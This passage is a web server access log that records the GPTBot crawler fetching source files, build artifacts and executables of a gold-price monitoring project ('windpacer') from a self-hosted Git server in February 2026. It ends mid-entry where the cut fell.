- GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 22469] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" -[17/Feb/2026:14:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 22469] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" -[17/Feb/2026:14:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 22471] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" -[17/Feb/2026:14:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" -[17/Feb/2026:14:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 10846] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" -[17/Feb/2026:14:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 10852] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" -[17/Feb/2026:14:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" -[17/Feb/2026:14:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" -[17/Feb/2026:14:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" -[17/Feb/2026:14:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 10361] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 10361] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 10884] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 10888] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 10852] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" -[17/Feb/2026:14:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" -[17/Feb/2026:14:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" [Client 74.7.227.38] [Length 10086] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9491] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:14:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:14:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:14:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 12225] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" -[17/Feb/2026:14:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:14:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:14:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9484] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:14:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:14:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" -[17/Feb/2026:14:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 44573707] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:14:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9516] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:14:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 44615970] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:14:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9522] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:14:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 44981538] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:14:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 635] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:14:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 11478] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:14:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 526156] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 522389] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 29753] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:14:03:02 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:14:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 11535] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:14:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:14:03:05 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:14:03:05 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:14:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:14:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 863930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:14:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:14:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 858166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:14:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 799983] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:14:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 10666] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 